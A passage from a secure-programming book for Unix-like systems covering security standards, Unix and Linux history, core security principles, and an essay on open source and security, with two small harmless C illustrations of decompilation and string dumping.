security management for use by those who are responsible for initiating,
implementing or maintaining security in their organization.'' The document
specifically identifies itself as "a starting point for developing
organization specific guidance." It also states that not all of the guidance
and controls it contains may be applicable, and that additional controls not
contained may be required. Even more importantly, these are intended to be
broad guidelines covering a number of areas, not to give definitive details
or "how-tos". It's worth noting that the original signing
of ISO/IEC 17799:2000 was controversial; Belgium, Canada, France, Germany,
Italy, Japan and the US voted against its adoption. However, it appears that
these votes were primarily a protest on parliamentary procedure, not on the
content of the document, and certainly people are welcome to use ISO 17799 if
they find it helpful. More information about ISO 17799 can be found in NIST's
[http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf] ISO/IEC
17799:2000 FAQ. ISO 17799 is highly related to BS 7799 part 1 and 2; more
information about BS 7799 can be found at [http://www.xisec.com/faq.htm]
http://www.xisec.com/faq.htm. ISO 17799 is currently under revision. It's
important to note that none of these standards (ISO 13335, ISO 17799, or BS
7799 parts 1 and 2) are intended to be a detailed set of technical guidelines
for software developers; they are all intended to provide broad guidelines in
a number of areas. This is important, because software developers who only
follow (for example) ISO 17799 will generally not produce secure software;
developers need much, much more detail than ISO 17799 provides.
The Commonly Accepted Security Practices & Recommendations (CASPR) project at
[http://www.caspr.org] http://www.caspr.org is trying to distill information
security knowledge into a series of papers available to all (under the GNU
FDL license, so that future document derivatives will continue to be
available to all). Clearly, security management needs to include keeping up
with patches as vulnerabilities are found and fixed. Beattie [2002] provides
an interesting analysis of how to determine when to apply patches,
contrasting the risk of a bad patch with the risk of intrusion (e.g., under
certain conditions, patches are optimally applied 10 or 30 days after they
are released).
If you're interested in the current state of vulnerabilities, there are other
resources available to you. The CVE at http://cve.mitre.org gives a standard
identifier for each (widespread) vulnerability. The paper [http://
securitytracker.com/learn/securitytracker-stats-2002.pdf] SecurityTracker
Statistics analyzes vulnerabilities to determine which were the most common.
The Internet Storm Center at http://isc.incidents.org/ shows
the prominence of various Internet attacks around the world.
This book assumes that the reader understands computer security issues in
general, the general security model of Unix-like systems, networking (in
particular TCP/IP based networks), and the C programming language. This book
does include some information about the Linux and Unix programming model for
security. If you need more information on how TCP/IP based networks and
protocols work, including their security protocols, consult general works on
TCP/IP such as [Murhammer 1998].
When I first began writing this document, there were many short articles but
no books on writing secure programs. There are now two other books on writing
secure programs. One is ``Building Secure Software'' by John Viega and Gary
McGraw [Viega 2002]; this is a very good book that discusses a number of
important security issues, but it omits a large number of important security
problems that are instead covered here. Basically, this book selects several
important topics and covers them well, but at the cost of omitting many other
important topics. The Viega book has a little more information for Unix-like
systems than for Windows systems, but much of it is independent of the kind
of system. The other book is ``Writing Secure Code'' by Michael Howard and
David LeBlanc [Howard 2002]. The title of this other book is misleading; the
book is solely about writing secure programs for Windows, and is basically
worthless if you are writing programs for any other system. This shouldn't be
surprising; it's published by Microsoft press, and its copyright is owned by
Microsoft. If you are trying to write secure programs for Microsoft's Windows
systems, it's a good book. Another useful source of secure programming
guidance is the Open Web Application Security Project (OWASP) Guide to
Building Secure Web Applications and Web Services; it has more on process
and fewer specifics than this book, but it has useful material in it.
This book covers all Unix-like systems, including Linux and the various
strains of Unix, and it particularly stresses Linux and provides details
about Linux specifically. There's some material specifically on Windows CE,
and in fact much of this material is not limited to a particular operating
system. If you know relevant information not already included here, please
let me know.
This book is copyright (C) 1999-2002 David A. Wheeler and is covered by the
GNU Free Documentation License (GFDL); see Appendix C and Appendix D for more
information.
Chapter 2 discusses the background of Unix, Linux, and security. Chapter 3
describes the general Unix and Linux security model, giving an overview of
the security attributes and operations of processes, filesystem objects, and
so on. This is followed by the meat of this book, a set of design and
implementation guidelines for developing applications on Linux and Unix
systems. The book ends with conclusions in Chapter 12, followed by a lengthy
bibliography and appendixes.
The design and implementation guidelines are divided into categories which I
believe emphasize the programmer's viewpoint. Programs accept inputs, process
data, call out to other resources, and produce output, as shown in Figure
1-1; notionally all security guidelines fit into one of these categories. I've
subdivided ``process data'' into structuring program internals and approach,
avoiding buffer overflows (which in some cases can also be considered an
input issue), language-specific information, and special topics. The chapters
are ordered to make the material easier to follow. Thus, the book chapters
giving guidelines discuss validating all input (Chapter 5), avoiding buffer
overflows (Chapter 6), structuring program internals and approach (Chapter 7
), carefully calling out to other resources (Chapter 8), judiciously sending
information back (Chapter 9), language-specific information (Chapter 10), and
finally information on special topics such as how to acquire random numbers (
Chapter 11).
Figure 1-1. Abstract View of a Program
-----------------------------------------------------------------------------
Chapter 2. Background
    I issued an order and a search was made, and it was found that this city
    has a long history of revolt against kings and has been a place of
    rebellion and sedition.
        Ezra 4:19 (NIV)
-----------------------------------------------------------------------------
2.1. History of Unix, Linux, and Open Source / Free Software
2.1.1. Unix
In 1969-1970, Kenneth Thompson, Dennis Ritchie, and others at AT&T Bell Labs
began developing a small operating system on a little-used PDP-7. The
operating system was soon christened Unix, a pun on an earlier operating
system project called MULTICS. In 1972-1973 the system was rewritten in the
programming language C, an unusual step that was visionary: due to this
decision, Unix was the first widely-used operating system that could switch
from and outlive its original hardware. Other innovations were added to Unix
as well, in part due to synergies between Bell Labs and the academic
community. In 1979, the ``seventh edition'' (V7) version of Unix was
released, the grandfather of all extant Unix systems.
After this point, the history of Unix becomes somewhat convoluted. The
academic community, led by Berkeley, developed a variant called the Berkeley
Software Distribution (BSD), while AT&T continued developing Unix under the
names ``System III'' and later ``System V''. In the late 1980's through early
1990's the ``wars'' between these two major strains raged. After many years
each variant adopted many of the key features of the other. Commercially,
System V won the ``standards wars'' (getting most of its interfaces into the
formal standards), and most hardware vendors switched to AT&T's System V.
However, System V ended up incorporating many BSD innovations, so the
resulting system was more a merger of the two branches. The BSD branch did
not die, but instead became widely used for research, for PC hardware, and
for single-purpose servers (e.g., many web sites use a BSD derivative).
The result was many different versions of Unix, all based on the original
seventh edition. Most versions of Unix were proprietary and maintained by
their respective hardware vendor, for example, Sun Solaris is a variant of
System V. Three versions of the BSD branch of Unix ended up as open source:
FreeBSD (concentrating on ease-of-installation for PC-type hardware), NetBSD
(concentrating on many different CPU architectures), and a variant of NetBSD,
OpenBSD (concentrating on security). More general information about Unix
history can be found at [http://www.datametrics.com/tech/unix/uxhistry/
brf-hist.htm] http://www.datametrics.com/tech/unix/uxhistry/brf-hist.htm,
[http://perso.wanadoo.fr/levenez/unix] http://perso.wanadoo.fr/levenez/unix,
and [http://www.crackmonkey.org/unix.html] http://www.crackmonkey.org/
unix.html. Much more information about the BSD history can be found in
[McKusick 1999] and [ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/src/
share/misc/bsd-family-tree] ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current
/src/share/misc/bsd-family-tree.
A slightly old but interesting advocacy piece that presents arguments for
using Unix-like systems (instead of Microsoft's products) is [http://
web.archive.org/web/20010801155417/www.unix-vs-nt.org/kirch] John Kirch's
paper ``Microsoft Windows NT Server 4.0 versus UNIX''.
-----------------------------------------------------------------------------
2.1.2. Free Software Foundation
In 1984 Richard Stallman's Free Software Foundation (FSF) began the GNU
project, a project to create a free version of the Unix operating system. By
free, Stallman meant software that could be freely used, read, modified, and
redistributed. The FSF successfully built a vast number of useful components,
including a C compiler (gcc), an impressive text editor (emacs), and a host
of fundamental tools. However, in the 1990's the FSF was having trouble
developing the operating system kernel [FSF 1998]; without a kernel their
dream of a completely free operating system would not be realized.
-----------------------------------------------------------------------------
2.1.3. Linux
In 1991 Linus Torvalds began developing an operating system kernel, which he
named ``Linux'' [Torvalds 1999]. This kernel could be combined with the FSF
material and other components (in particular some of the BSD components and
MIT's X-windows software) to produce a freely-modifiable and very useful
operating system. This book will term the kernel itself the ``Linux kernel''
and an entire combination as ``Linux''. Note that many use the term ``GNU/
Linux'' instead for this combination.
In the Linux community, different organizations have combined the available
components differently. Each combination is called a ``distribution'', and
the organizations that develop distributions are called ``distributors''.
Common distributions include Red Hat, Mandrake, SuSE, Caldera, Corel, and
Debian. There are differences between the various distributions, but all
distributions are based on the same foundation: the Linux kernel and the GNU
glibc libraries. Since both are covered by ``copyleft'' style licenses,
changes to these foundations generally must be made available to all, a
unifying force between the Linux distributions at their foundation that does
not exist between the BSD and AT&T-derived Unix systems. This book is not
specific to any Linux distribution; when it discusses Linux it presumes Linux
kernel version 2.2 or greater and the C library glibc 2.1 or greater, valid
assumptions for essentially all current major Linux distributions.
-----------------------------------------------------------------------------
2.1.4. Open Source / Free Software
Increased interest in software that is freely shared has made it increasingly
necessary to define and explain it. A widely used term is ``open source
software'', which is further defined in [OSI 1999]. Eric Raymond [1997, 1998]
wrote several seminal articles examining its various development processes.
Another widely-used term is ``free software'', where the ``free'' is short
for ``freedom'': the usual explanation is ``free speech, not free beer.''
Neither phrase is perfect. The term ``free software'' is often confused with
programs whose executables are given away at no charge, but whose source code
cannot be viewed, modified, or redistributed. Conversely, the term ``open
source'' is sometimes (ab)used to mean software whose source code is visible,
but for which there are limitations on use, modification, or redistribution.
This book uses the term ``open source'' for its usual meaning, that is,
software which has its source code freely available for use, viewing,
modification, and redistribution; a more detailed definition is contained in
the [http://www.opensource.org/osd.html] Open Source Definition. In some
cases, a difference in motive is suggested; those preferring the term ``free
software'' wish to strongly emphasize the need for freedom, while those using
the term ``open source'' may have other motives (e.g., higher reliability) or
simply wish to appear less strident. Information on this definition of free
software, and the motivations behind it, can be found at [http://www.fsf.org]
http://www.fsf.org.
Those interested in reading advocacy pieces for open source software and free
software should see [http://www.opensource.org] http://www.opensource.org and
[http://www.fsf.org] http://www.fsf.org. There are other documents which
examine such software, for example, Miller [1995] found that open source
software was noticeably more reliable than proprietary software (using their
measurement technique, which measured resistance to crashing due to random
input).
-----------------------------------------------------------------------------
2.1.5. Comparing Linux and Unix
This book uses the term ``Unix-like'' to describe systems intentionally like
Unix. In particular, the term ``Unix-like'' includes all major Unix variants
and Linux distributions. Note that many people simply use the term ``Unix''
to describe these systems instead. Originally, the term ``Unix'' meant a
particular product developed by AT&T. Today, the Open Group owns the Unix
trademark, and it defines Unix as ``the worldwide Single UNIX
Specification''.
Linux is not derived from Unix source code, but its interfaces are
intentionally like Unix. Therefore, Unix lessons learned generally apply to
both, including information on security. Most of the information in this book
applies to any Unix-like system. Linux-specific information has been
intentionally added to enable those using Linux to take advantage of Linux's
capabilities.
Unix-like systems share a number of security mechanisms, though there are
subtle differences and not all systems have all mechanisms available. All
include user and group ids (uids and gids) for each process and a filesystem
with read, write, and execute permissions (for user, group, and other). See
Thompson [1974] and Bach [1986] for general information on Unix systems,
including their basic security mechanisms. Chapter 3 summarizes key security
features of Unix and Linux.
-----------------------------------------------------------------------------
2.2. Security Principles
There are many general security principles which you should be familiar with;
one good place for general information on information security is the
Information Assurance Technical Framework (IATF) [NSA 2000]. NIST has
identified high-level ``generally accepted principles and practices''
[Swanson 1996]. You could also look at a general textbook on computer
security, such as [Pfleeger 1997]. NIST Special Publication 800-27 describes
a number of good engineering principles (although, since they're abstract,
they're insufficient for actually building secure programs - hence this
book); you can get a copy at [http://csrc.nist.gov/publications/nistpubs/
800-27/sp800-27.pdf] http://csrc.nist.gov/publications/nistpubs/800-27/
sp800-27.pdf. A few security principles are summarized here.
Often computer security objectives (or goals) are described in terms of three
overall objectives:
  * Confidentiality (also known as secrecy), meaning that the computing
    system's assets can be read only by authorized parties.
  * Integrity, meaning that the assets can only be modified or deleted by
    authorized parties in authorized ways.
  * Availability, meaning that the assets are accessible to the authorized
    parties in a timely manner (as determined by the system's requirements).
    The failure to meet this goal is called a denial of service.
Some people define additional major security objectives, while others lump
those additional goals as special cases of these three. For example, some
separately identify non-repudiation as an objective; this is the ability to
``prove'' that a sender sent or receiver received a message (or both), even
if the sender or receiver wishes to deny it later. Privacy is sometimes
addressed separately from confidentiality; some define this as protecting the
confidentiality of a user (e.g., their identity) instead of the data. Most
objectives require identification and authentication, which is sometimes
listed as a separate objective. Often auditing (also called accountability)
is identified as a desirable security objective. Sometimes ``access control''
and ``authenticity'' are listed separately as well. For example, the U.S.
Department of Defense (DoD), in DoD Directive 3600.1, defines ``information
assurance'' as ``information operations (IO) that protect and defend
information and information systems by ensuring their availability,
integrity, authentication, confidentiality, and nonrepudiation. This includes
providing for restoration of information systems by incorporating protection,
detection, and reaction capabilities.''
In any case, it is important to identify your program's overall security
objectives, no matter how you group them together, so that you'll know when
you've met them.
Sometimes these objectives are a response to a known set of threats, and
sometimes some of these objectives are required by law. For example, for U.S.
banks and other financial institutions, there's a new privacy law called the
``Gramm-Leach-Bliley'' (GLB) Act. This law mandates disclosure of personal
information shared and means of securing that data, requires disclosure of
personal information that will be shared with third parties, and directs
institutions to give customers a chance to opt out of data sharing. [Jones
2000]
There is sometimes conflict between security and some other general system/
software engineering principles. Security can sometimes interfere with ``ease
of use'', for example, installing a secure configuration may take more effort
than a ``trivial'' installation that works but is insecure. Often, this
apparent conflict can be resolved, for example, by re-thinking a problem it's
often possible to make a secure system also easy to use. There's also
sometimes a conflict between security and abstraction (information hiding);
for example, some high-level library routines may be implemented securely or
not, but their specifications won't tell you. In the end, if your application
must be secure, you must do things yourself if you can't be sure otherwise -
yes, the library should be fixed, but it's your users who will be hurt by
your poor choice of library routines.
A good general security principle is ``defense in depth''; you should have
numerous defense mechanisms (``layers'') in place, designed so that an
attacker has to defeat multiple mechanisms to perform a successful attack.
-----------------------------------------------------------------------------
2.3. Why do Programmers Write Insecure Code?
Many programmers don't intend to write insecure code - but do anyway. Here
are a number of purported reasons for this. Most of these were collected and
summarized by Aleph One on Bugtraq (in a posting on December 17, 1998):
  * There is no curriculum that addresses computer security in most schools.
    Even when there is a computer security curriculum, it often doesn't
    discuss how to write secure programs as a whole. Many such curricula
    study only certain areas such as cryptography or protocols. These are
    important, but they often fail to discuss common real-world issues such
    as buffer overflows, string formatting, and input checking. I believe
    this is one of the most important problems; even those programmers who go
    through colleges and universities are very unlikely to learn how to write
    secure programs, yet we depend on those very people to write secure
    programs.
  * Programming books/classes do not teach secure/safe programming
    techniques. Indeed, until recently there were no books on how to write
    secure programs at all (this book is one of those few).
  * No one uses formal verification methods.
  * C is an unsafe language, and the standard C library string functions are
    unsafe. This is particularly important because C is so widely used - the
    ``simple'' ways of using C permit dangerous exploits.
  * Programmers do not think ``multi-user.''
  * Programmers are human, and humans are lazy. Thus, programmers will often
    use the ``easy'' approach instead of a secure approach - and once it
    works, they often fail to fix it later.
  * Most programmers are simply not good programmers.
  * Most programmers are not security people; they simply don't often think
    like an attacker does.
  * Most security people are not programmers. This was a statement made by
    some Bugtraq contributors, but it's not clear that this claim is really
    true.
  * Most computer security models are terrible.
  * There is lots of ``broken'' legacy software. Fixing this software (to
    remove security faults or to make it work with more restrictive security
    policies) is difficult.
  * Consumers don't care about security. (Personally, I have hope that
    consumers are beginning to care about security; a computer system that is
    constantly exploited is neither useful nor user-friendly. Also, many
    consumers are unaware that there's even a problem, assume that it can't
    happen to them, or think that things cannot be made better.)
  * Security costs extra development time.
  * Security costs in terms of additional testing (red teams, etc.).
-----------------------------------------------------------------------------
2.4. Is Open Source Good for Security?
There's been a lot of debate by security practitioners about the impact of
open source approaches on security. One of the key issues is that open source
exposes the source code to examination by everyone, both the attackers and
defenders, and reasonable people disagree about the ultimate impact of this
situation. (Note - you can get the latest version of this essay by going to
the main website for this book, [http://www.dwheeler.com/secure-programs]
http://www.dwheeler.com/secure-programs.)
-----------------------------------------------------------------------------
2.4.1. View of Various Experts
First, let's examine what security experts have to say.
Bruce Schneier is a well-known expert on computer security and cryptography.
He argues that smart engineers should ``demand open source code for anything
related to security'' [Schneier 1999], and he also discusses some of the
preconditions which must be met to make open source software secure. Vincent
Rijmen, a developer of the winning Advanced Encryption Standard (AES)
encryption algorithm, believes that the open source nature of Linux provides
a superior vehicle to making security vulnerabilities easier to spot and fix,
``Not only because more people can look at it, but, more importantly, because
the model forces people to write more clear code, and to adhere to standards.
This in turn facilitates security review'' [Rijmen 2000].
Elias Levy (Aleph1) is the former moderator of one of the most popular
security discussion groups - Bugtraq. He discusses some of the problems in
making open source software secure in his article "Is Open Source Really More
Secure than Closed?". His summary is:
So does all this mean Open Source Software is no better than closed
source software when it comes to security vulnerabilities? No. Open
Source Software certainly does have the potential to be more secure than
its closed source counterpart. But make no mistake, simply being open
source is no guarantee of security.
Whitfield Diffie is the co-inventor of public-key cryptography (the basis of
all Internet security) and chief security officer and senior staff engineer
at Sun Microsystems. In his 2003 article [http://zdnet.com.com/
2100-1107-980938.html] Risky business: Keeping security a secret, he argues
that proprietary vendors' claims that their software is more secure because
it's secret are nonsense. He identifies and then counters two main claims made
by proprietary vendors: (1) that release of code benefits attackers more than
anyone else because a lot of hostile eyes can also look at open-source code,
and that (2) a few expert eyes are better than several random ones. He first
notes that while giving programmers access to a piece of software doesn't
guarantee they will study it carefully, there is a group of programmers who
can be expected to care deeply: Those who either use the software personally
or work for an enterprise that depends on it. "In fact, auditing the programs
on which an enterprise depends for its own security is a natural function of
the enterprise's own information-security organization." He then counters the
second argument, noting that "As for the notion that open source's usefulness
to opponents outweighs the advantages to users, that argument flies in the
face of one of the most important principles in security: A secret that
cannot be readily changed should be regarded as a vulnerability." He closes
noting that
"It's simply unrealistic to depend on secrecy for security in computer
software. You may be able to keep the exact workings of the program out
of general circulation, but can you prevent the code from being
reverse-engineered by serious opponents? Probably not."
John Viega's article [http://dev-opensourceit.earthweb.com/news/
000526_security.html] "The Myth of Open Source Security" also discusses
issues, and summarizes things this way:
Open source software projects can be more secure than closed source
projects. However, the very things that can make open source programs
secure -- the availability of the source code, and the fact that large
numbers of users are available to look for and fix security holes -- can
also lull people into a false sense of security.
[http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html] Michael
H. Warfield's "Musings on open source security" is very positive about the
impact of open source software on security. In contrast, Fred Schneider
doesn't believe that open source helps security, saying ``there is no reason
to believe that the many eyes inspecting (open) source code would be
successful in identifying bugs that allow system security to be compromised''
and claiming that ``bugs in the code are not the dominant means of attack''
[Schneider 2000]. He also claims that open source rules out control of the
construction process, though in practice there is such control - all major
open source programs have one or a few official versions with ``owners'' with
reputations at stake. Peter G. Neumann discusses ``open-box'' software (in
which source code is available, possibly only under certain conditions),
saying ``Will open-box software really improve system security? My answer is
not by itself, although the potential is considerable'' [Neumann 2000].
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
has developed a paper on why they believe open source is more effective for
security [TruSecure 2001]. [http://www-106.ibm.com/developerworks/linux/
library/l-oss.html?open&I=252,t=gr,p=SeclmpOS] Natalie Walker Whitlock's IBM
DeveloperWorks article discusses the pros and cons as well. Brian Witten,
Carl Landwehr, and Michael Caloyannides [Witten 2001] published in IEEE
Software an article tentatively concluding that having source code available
should work in the favor of system security; they note:
``We can draw four additional conclusions from this discussion. First,
access to source code lets users improve system security -- if they have
the capability and resources to do so. Second, limited tests indicate
that for some cases, open source life cycles produce systems that are
less vulnerable to nonmalicious faults. Third, a survey of three
operating systems indicates that one open source operating system
experienced less exposure in the form of known but unpatched
vulnerabilities over a 12-month period than was experienced by either of
two proprietary counterparts. Last, closed and proprietary system
development models face disincentives toward fielding and supporting more
secure systems as long as less secure systems are more profitable.
Notwithstanding these conclusions, arguments in this important matter are
in their formative stages and in dire need of metrics that can reflect
security delivered to the customer.''
Scott A. Hissam and Daniel Plakosh's [http://www.ics.uci.edu/~wscacchi/Papers
/New/IEE_hissam.pdf] ``Trust and Vulnerability in Open Source Software''
discusses the pluses and minuses of open source software. As with other papers,
they note that just because the software is open to review, it should not
automatically follow that such a review has actually been performed. Indeed,
they note that this is a general problem for all software, open or closed -
it is often questionable if many people examine any given piece of software.
One interesting point is that they demonstrate that attackers can learn about
a vulnerability in a closed source program (Windows) from patches made to an
OSS/FS program (Linux). In this example, Linux developers fixed a
vulnerability before attackers tried to attack it, and attackers correctly
surmised that a similar problem might still be in Windows (and it was).
Unless OSS/FS programs are forbidden, this kind of learning is difficult to
prevent. Therefore, the existence of an OSS/FS program can reveal the
vulnerabilities of both the OSS/FS and proprietary programs performing the
same function - but in this example, the OSS/FS program was fixed first.
-----------------------------------------------------------------------------
2.4.2. Why Closing the Source Doesn't Halt Attacks
It's been argued that a system without source code is more secure because,
since there's less information available for an attacker, it should be harder
for an attacker to find the vulnerabilities. This argument has a number of
weaknesses, however, because although source code is extremely important when
trying to add new capabilities to a program, attackers generally don't need
source code to find a vulnerability.
First, it's important to distinguish between ``destructive'' acts and
``constructive'' acts. In the real world, it is much easier to destroy a car
than to build one. In the software world, it is much easier to find and
exploit a vulnerability than to add significant new functionality to that
software. Attackers have many advantages against defenders because of this
difference. Software developers must try to have no security-relevant
mistakes anywhere in their code, while attackers only need to find one.
Developers are primarily paid to get their programs to work... attackers
don't need to make the program work, they only need to find a single
weakness. And as I'll describe in a moment, it takes less information to
attack a program than to modify one.
Generally attackers (against both open and closed programs) start by knowing
about the general kinds of security problems programs have. There's no point
in hiding this information; it's already out, and in any case, defenders need
that kind of information to defend themselves. Attackers then use techniques
to try to find those problems; I'll group the techniques into ``dynamic''
techniques (where you run the program) and ``static'' techniques (where you
examine the program's code - be it source code or machine code).
In ``dynamic'' approaches, an attacker runs the program, sending it data
(often problematic data), and sees if the program's response indicates a
common vulnerability. Open and closed programs have no difference here, since
the attacker isn't looking at code. Attackers may also look at the code, the
``static'' approach. For open source software, they'll probably look at the
source code and search it for patterns. For closed source software, they
might search the machine code (usually presented in assembly language format
to simplify the task) for essentially the same patterns. They might also use
tools called ``decompilers'' that turn the machine code back into source code
and then search the source code for the vulnerable patterns (the same way
they would search for vulnerabilities in open source software). See Flake
[2001] for one discussion of how closed code can still be examined for
security vulnerabilities (e.g., using disassemblers). This point is
important: even if an attacker wanted to use source code to find a
vulnerability, a closed source program has no advantage, because the attacker
can use a disassembler to re-create the source code of the product.
Non-developers might ask ``if decompilers can create source code from machine
code, then why do developers say they need source code instead of just
machine code?'' The problem is that although developers don't need source
code to find security problems, developers do need source code to make
substantial improvements to the program. Although decompilers can turn
machine code back into a ``source code'' of sorts, the resulting source code
is extremely hard to modify. Typically most understandable names are lost, so
instead of variables like ``grand_total'' you get ``x123123'', instead of
methods like ``display_warning'' you get ``f123124'', and the code itself may
have spatterings of assembly in it. Also, _ALL_ comments and design
information are lost. This isn't a serious problem for finding security
problems, because generally you're searching for patterns indicating
vulnerabilities, not for internal variable or method names. Thus, decompilers
can be useful for finding ways to attack programs, but aren't helpful for
updating programs.
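The name loss described above can be illustrated with a toy pair of C functions. Both are invented for this example: the first is what a developer writes, the second is the sort of output a decompiler reconstructs from the compiled machine code. They behave identically, but only one is practical to modify.

```c
/* Original source: meaningful names; comments and design intent survive. */
static int add_sales_tax(int subtotal_cents, int tax_rate_percent)
{
    int grand_total = subtotal_cents
                    + (subtotal_cents * tax_rate_percent) / 100;
    return grand_total;
}

/* Decompiled equivalent (names and numbers invented for illustration):
 * the same machine behavior, but every identifier and comment is gone,
 * so safely changing it is far harder - while spotting a vulnerable
 * pattern in it is just as easy. */
static int f123124(int x123123, int x123125)
{
    return x123123 + (x123123 * x123125) / 100;
}
```

This is why source code matters for modification but gives attackers little extra help.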
Thus, developers will say ``source code is vital'' when they intend to add
functionality, but the fact that the source code for closed source programs
is hidden doesn't protect the program very much.
-----------------------------------------------------------------------------
2.4.3. Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away
Sometimes it's noted that a vulnerability that exists but is unknown can't be
exploited, so the system is ``practically secure''. In theory this is true, but
the problem is that once someone finds the vulnerability, the finder may just
exploit the vulnerability instead of helping to fix it. Having unknown
vulnerabilities doesn't really make the vulnerabilities go away; it simply
means that the vulnerabilities are a time bomb, with no way to know when
they'll be exploited. Fundamentally, the problem of someone exploiting a
vulnerability they discover is a problem for both open and closed source
systems.
One related claim sometimes made (though not as directly related to OSS/FS)
is that people should not post warnings about vulnerabilities and discuss
them. This sounds good in theory, but the problem is that attackers already
distribute information about vulnerabilities through a large number of
channels. In short, such approaches would leave defenders vulnerable, while
doing nothing to inhibit attackers. In the past, companies actively tried to
prevent disclosure of vulnerabilities, but experience showed that, in
general, companies didn't fix vulnerabilities until they were widely known to
their users (who could then insist that the vulnerabilities be fixed). This
is all part of the argument for ``full disclosure.'' Gartner Group has a
blunt commentary in a CNET.com article titled ``Commentary: Hype is the real
issue - Tech News.'' They stated:
The comments of Microsoft's Scott Culp, manager of the company's security
response center, echo a common refrain in a long, ongoing battle over
information. Discussions of morality regarding the distribution of
information go way back and are very familiar. Several centuries ago, for
example, the church tried to squelch Copernicus' and Galileo's theory of
the sun being at the center of the solar system... Culp's attempt to
blame "information security professionals" for the recent spate of
vulnerabilities in Microsoft products is at best disingenuous. Perhaps,
it also represents an attempt to deflect criticism from the company that
built those products... [The] efforts of all parties contribute to a
continuous process of improvement. The more widely vulnerabilities become
known, the more quickly they get fixed.
-----------------------------------------------------------------------------
2.4.4. How OSS/FS Counters Trojan Horses
It's sometimes argued that open source programs, because there's no enforced
control by a single company, permit people to insert Trojan Horses and other
malicious code. Trojan horses can be inserted into open source code, true,
but they can also be inserted into proprietary code. A disgruntled or bribed
employee can insert malicious code, and in many organizations it's much less
likely to be found than in an open source program. After all, no one outside
the organization can review the source code, and few companies review their
code internally (or, even if they do, few can be assured that the reviewed
code is actually what is used). And the notion that a closed-source company
can be sued later has little evidence; nearly all licenses disclaim all
warranties, and courts have generally not held software development companies
liable.
Borland's InterBase server is an interesting case in point. Some time between
1992 and 1994, Borland inserted an intentional ``back door'' into their
database server, ``InterBase''. This back door allowed any local or remote
user to manipulate any database object and install arbitrary programs, and in
some cases could lead to controlling the machine as ``root''. This
vulnerability stayed in the product for at least 6 years - no one else could
review the product, and Borland had no incentive to remove the vulnerability.
Then Borland released its source code in July 2000. The "Firebird" project
began working with the source code, and uncovered this serious security
problem with InterBase in December 2000. By January 2001 the CERT announced
the existence of this back door as CERT advisory CA-2001-01. What's
discouraging is that the backdoor can be easily found simply by looking at an
ASCII dump of the program (a common cracker trick). Once this problem was
found by open source developers reviewing the code, it was patched quickly.
You could argue that, by keeping the password unknown, the program stayed
safe, and that opening the source made the program less secure. I think this
is nonsense, since ASCII dumps are trivial to do and well-known as a standard
attack technique, and not all attackers have sudden urges to announce
vulnerabilities - in fact, there's no way to be certain that this
vulnerability has not been exploited many times. It's clear that after the
source was opened, the source code was reviewed over time, and the
vulnerabilities found and fixed. One way to characterize this is to say that
the original code was vulnerable, its vulnerabilities became easier to
exploit when it was first made open source, and then finally these
vulnerabilities were fixed.
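The ``ASCII dump'' trick mentioned above can be sketched in a few lines of C. This is a hypothetical, minimal reimplementation of the idea behind the Unix strings(1) tool (the function name, limits, and embedded password are invented for this example): scan a raw byte buffer, such as an executable read from disk, and collect every run of printable characters. A hard-coded account name or password embedded in a binary shows up immediately in such a dump.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Sketch of the ``ASCII dump'' trick: collect each run of at least
 * min_len printable characters from buf into out, one per line,
 * the way strings(1) would. Returns the number of runs found. */
static int dump_printable_runs(const unsigned char *buf, size_t len,
                               size_t min_len, char *out, size_t out_len)
{
    size_t run_start = 0;
    int found = 0;
    out[0] = '\0';
    for (size_t i = 0; i <= len; i++) {
        if (i < len && isprint(buf[i]))
            continue;                   /* still inside a printable run */
        size_t n = i - run_start;
        if (n >= min_len) {             /* run long enough: record it */
            size_t used = strlen(out);
            if (used + n + 2 <= out_len) {
                memcpy(out + used, buf + run_start, n);
                out[used + n] = '\n';
                out[used + n + 1] = '\0';
            }
            found++;                    /* counted even if out is full */
        }
        run_start = i + 1;              /* next run begins past this byte */
    }
    return found;
}
```

Running this over a binary with an embedded credential (here, the invented string "s3cretpw") recovers it with no disassembly at all, which is why hiding a back door in machine code offers so little protection.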
-----------------------------------------------------------------------------
2.4.5. Other Advantages
The advantages of having source code open extend not just to software that
is being attacked, but also to vulnerability assessment scanners.
Vulnerability assessment scanners intentionally look for vulnerabilities in
configured systems. A recent Network Computing evaluation found that the best
scanner (which, among other things, found the most legitimate
vulnerabilities) was Nessus, an open source scanner [Forristal 2001].
-----------------------------------------------------------------------------
2.4.6. Bottom Line
So, what's the bottom line? I personally believe that when a program began as
closed source and is then first made open source, it often starts less secure
for any users (through exposure of vulnerabilities), and over time (say a few
years) it has the potential to be much more secure than a closed program. If
the program began as open source software, the public scrutiny is more likely
to improve its security before it's ready for use by significant numbers of
users, but there are several caveats to this statement (it's not an ironclad
rule). Just making a program open source doesn't suddenly make a program
secure, and just because a program is open source does not guarantee
security:
  * First, people have to actually review the code. This is one of the key
points of debate - will people really review code in an open source
project? All sorts of factors can reduce the amount of review: being a
niche or rarely-used product (where there are few potential reviewers),
having few developers, and use of a rarely-used computer language.
Clearly, a program that has a single developer and no other contributors
of any kind doesn't have this kind of review. On the other hand, a
program that has a primary author and many other people who occasionally
examine the code and contribute suggests that there are others reviewing
the code (at least to create contributions). In general, if there are
more reviewers, there's a higher likelihood that someone will
identify a flaw - this is the basis of the ``many eyeballs'' theory. Note
that, for example, the OpenBSD project continuously examines programs for
security flaws, so the components in its innermost parts have certainly
undergone a lengthy review. Since OSS/FS discussions are often held
publicly, this level of review is something that potential users can
judge for themselves.
One factor that can particularly reduce review likelihood is not actually
being open source. Some vendors like to posture their ``disclosed
source'' (also called ``source available'') programs as being open
source, but since the program owner has extensive exclusive rights,
others will have far less incentive to work ``for free'' for the owner on
the code. Even open source licenses which have unusually asymmetric
rights (such as the MPL) have this problem. After all, people are less
likely to voluntarily participate if someone else will have rights to
their results that they don't have (as Bruce Perens says, ``who wants to
be someone else's unpaid employee?''). In particular, since the reviewers
with the most incentive tend to be people trying to modify the program,
this disincentive to participate reduces the number of ``eyeballs''.
Elias Levy made this mistake in his article about open source security;
his examples of software that had been broken into (e.g., TIS's Gauntlet)
were not, at the time, open source.
  * Second, at least some of the people developing and reviewing the code
